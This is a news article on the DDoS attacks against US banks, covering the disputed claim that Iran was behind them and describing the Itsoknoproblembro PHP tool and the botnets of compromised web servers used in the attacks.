Feeds

US gov blames Iran for cyberattacks on American banks

Itsoknoproblembro and the bRobots

Secure remote control for conventional and virtual desktops

Denial-of-service attacks against US banks' web systems were the work of Iran rather than Islamic activists, says a former American government official.

A group called the Izz ad-Din al-Qassam Cyber Fighters claimed responsibility for two waves of cyber-attacks against US banks including US Bancorp, Bank of America, Citigroup, Wells Fargo that took place in September and December. The stated reason for the "protest" attacks was religious outrage over the continuing presence on YouTube of the inflammatory Innocence of Muslims video on YouTube.

James A Lewis of the Center for Strategic and International Studies in Washington told the New York Times that the attacks were actually the work of Iran, rather than outraged hacktivists. He reckons the aim was actually retaliation over the deployment of Stuxnet and other cyberweapons against Iran as well as economic sanctions.

Security researchers at Arbor Networks concluded last month that in both cases attack traffic was launched from insecure websites rather than malware-infected PCs. Compromised PHP web applications and insecure Wordpress installation were pressed into service as part of a PHP Web server botnet, controlled by tools such as bRobot.

The skill involved in putting together the attacks as well as the use of server based resources has apparently convinced US government official that a state-sponsored entity, namely Iran, rather than hacktivists are behind the attacks. "“There is no doubt within the US government that Iran is behind these attacks,” Lewis, a former official in the state and commerce departments, told the NYT. Lewis points to the volume of traffic involved in the US bank attacks (“multiple times” the amount that Russia directed at Estonia in 2007) in attempting to substantiate his arguments but as the NYT points out "American officials have not offered any technical evidence to back up their claims".

Security vendors are able to say that the attacks against US banks are fairly sophisticated but cannot pinpoint who developed them. “The scale, the scope and the effectiveness of these attacks have been unprecedented,” said Carl Herberger, vice president of security solutions at Israeli-based security firm Radware told the NYT. “There have never been this many financial institutions under this much duress.”

Researchers at Radware discovered that cloud services and public web hosting servers* had been infected with a strain of malware, called Itsoknoproblembro. "The malware has existed for years, but the banking attacks were the first time it used data centers to attack external victims," the NYT reports, adding that Itsoknoproblembro was designed to be difficult if not impossible to trace back to command and control systems. Attackers used infected servers to disgorge attack traffic at each banking site until it slowed or collapsed, according to Radware. Peak attack traffic against US banks hit 70 Gbps.

An entry on Radware's website that Itsoknoproblembro is a PHP-based hacker tool that has recently been customised to serve in DDoS attacks.

The 'itsoknoproblembro' tool was designed and implemented as a general purpose PHP script injected into a victim’s machine allowing the attacker to upload and execute arbitrary Perl scripts on the target’s machine.

The 'itsoknoproblembro' script injects an encrypted payload, in order to bypass IPS and Malware gateways into the website main file index.php, allowing the attacker to upload new Perl scripts at any time.

Initial server infection is usually done by using the well known Remote File Inclusion (RFI) technique. By uploading Perl scripts that run different DOS flood vectors, the server might act as a bot in a DDOS botnet army.

Although originally designed for general purpose, some variants of this tool found in the wild were customized to act as a proprietary DDOS tool, implementing the flood vector logics inside without the need to upload additional scripts.

DDoS protection service firm Prolexic launched a suite of SNORT rules and a log analysis tool to defend against itsoknoproblembro last week.

It also links the threat to attacks against the US banking industry. But the tool has also been used against the energy and hosting provider industries. "The attack vectors include POST, GET, TCP and UDP floods, with and without proxies, including a so-called Kamikaze GET flood script that can repeatedly relaunch automated attacks," according to a statement by Prolexic.

Using a cloud-based system to launch denial of service attacks rather than botnet networks of compromised PCs shows that whoever is behind the attacks is keeping up with the latest trends in technology. It's hardly evidence of state involvement, at least by itself. There's nothing in what either Prolexic, Radware or Arbor are saying to suggest the latest attacks are state-sponsored much less pointing the finger of blame towards Iran.

Nonetheless, unnamed US intelligence officials appear adamant that the Izz ad-Din al-Qassam Cyber Fighters is actually a cover for Iran. ®

Bootnote

Infected web servers are called bRobots by both Radware and Prolexic. This naming convention differentiates paned servers from the compromised PCs (zombies, bots or drones) in conventional botnet networks.

New hybrid storage solutions

More from The Register

next story
Israeli spies rebel over mass-snooping on innocent Palestinians
'Disciplinary treatment will be sharp and clear' vow spy-chiefs
Google recommends pronounceable passwords
Super Chrome goes into battle with Mr Mxyzptlk
Infosec geniuses hack a Canon PRINTER and install DOOM
Internet of Stuff securo-cockups strike yet again
THREE QUARTERS of Android mobes open to web page spy bug
Metasploit module gobbles KitKat SOP slop
'Speargun' program is fantasy, says cable operator
We just might notice if you cut our cables
Reddit wipes clean leaked celeb nudie pics, tells users to zip it
Now we've had all THAT TRAFFIC, we 'deplore' this theft
Snowden, Dotcom, throw bombs into NZ election campaign
Claim of tapped undersea cable refuted by Kiwi PM as Kim claims extradition plot
Apple Pay is a tidy payday for Apple with 0.15% cut, sources say
Cupertino slurps 15 cents from every $100 purchase
prev story

Whitepapers

Secure remote control for conventional and virtual desktops
Balancing user privacy and privileged access, in accordance with compliance frameworks and legislation. Evaluating any potential remote control choice.
Saudi Petroleum chooses Tegile storage solution
A storage solution that addresses company growth and performance for business-critical applications of caseware archive and search along with other key operational systems.
High Performance for All
While HPC is not new, it has traditionally been seen as a specialist area – is it now geared up to meet more mainstream requirements?
Security for virtualized datacentres
Legacy security solutions are inefficient due to the architectural differences between physical and virtual environments.
Providing a secure and efficient Helpdesk
A single remote control platform for user support is be key to providing an efficient helpdesk. Retain full control over the way in which screen and keystroke data is transmitted.